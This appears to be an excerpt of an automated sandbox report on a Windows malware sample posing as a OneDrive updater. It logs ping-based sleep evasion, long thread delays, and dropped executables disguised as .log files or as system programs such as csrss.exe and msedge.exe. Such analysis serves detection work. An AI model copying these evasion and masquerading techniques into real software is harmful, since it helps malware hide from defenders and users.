Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Memory allocated: 720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Memory allocated: 1A6C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Documents\csrss.exe	Memory allocated: 2510000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\csrss.exe	Memory allocated: 1A510000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Memory allocated: D00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Memory allocated: 1A6F0000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\csrss.exe	Memory allocated: 2510000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\csrss.exe	Memory allocated: 1A510000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Memory allocated: 27A0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Memory allocated: 1AA10000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\csrss.exe	Memory allocated: FE0000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\csrss.exe	Memory allocated: 1AFA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Memory allocated: 9A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Memory allocated: 1A370000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\csrss.exe	Memory allocated: 11A0000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\csrss.exe	Memory allocated: 1ACA0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Memory allocated: 8A0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Memory allocated: 1A420000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Memory allocated: D70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Memory allocated: 1A8D0000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\csrss.exe	Memory allocated: 15E0000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\csrss.exe	Memory allocated: 1AFA0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\csrss.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\csrss.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\csrss.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\csrss.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\csrss.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2604	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2532	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2306
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2034
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2129
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2554

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pniscWHs.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vcUYBlwU.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lYJBZlMp.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YUqBbklL.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tYWrkemb.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OnkfajLl.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wnmzmVNo.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\APmXeiLI.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GKdPiyNu.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PlXlrHgd.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oJeKCcyH.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lJHjOcES.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GVFPWxSW.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UJJDbPGV.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HsjPOZbA.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hJaCsdsL.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LAjmiABv.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZXUBvZWR.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ntqjPtDe.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QEZfGaYD.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pzyaVZFL.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AVoOdXhS.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IzKxwscH.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sjwHPvrg.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vqLrRVyt.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SrUDuXuD.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XVEvJLRT.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dVzTSQDZ.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XbGmIAmd.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hyzrKdBs.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pbHguWQZ.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WoNdSLwd.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JOMOLeeW.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EERPqGGD.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JDsxUuzs.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NsnWYYhw.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NIROLNIi.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rBkIrIJH.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vaJZGNqW.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fxnuLaBD.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CUnYbBNA.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WTfEbhlW.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LpAoDpdA.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ocVadywh.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xJPzewWS.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BSPWzXwN.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\caoTeAzl.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WmaEvGYQ.log	Jump to dropped file

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe TID: 6344	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808	Thread sleep count: 2604 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1792	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800	Thread sleep count: 2532 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 968	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872	Thread sleep count: 2306 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008	Thread sleep count: 2034 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3960	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012	Thread sleep count: 2129 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2460	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972	Thread sleep count: 2554 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5416	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\csrss.exe TID: 2092	Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Documents\csrss.exe TID: 1964	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe TID: 2176	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe TID: 7856	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\csrss.exe TID: 7404	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe TID: 7456	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\csrss.exe TID: 6720	Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Documents\csrss.exe TID: 3916	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe TID: 5204	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe TID: 8036	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\csrss.exe TID: 7144	Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Documents\csrss.exe TID: 5996	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe TID: 1268	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe TID: 4828	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe TID: 7076	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe TID: 5880	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\csrss.exe TID: 6468	Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Documents\csrss.exe TID: 2184	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\Public\Documents\csrss.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Documents\csrss.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Documents\csrss.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Documents\csrss.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Documents\csrss.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

Code function: 0_2_00007FFAAC468B98 GetSystemInfo,

0_2_00007FFAAC468B98

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\csrss.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\csrss.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\csrss.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\csrss.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\csrss.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

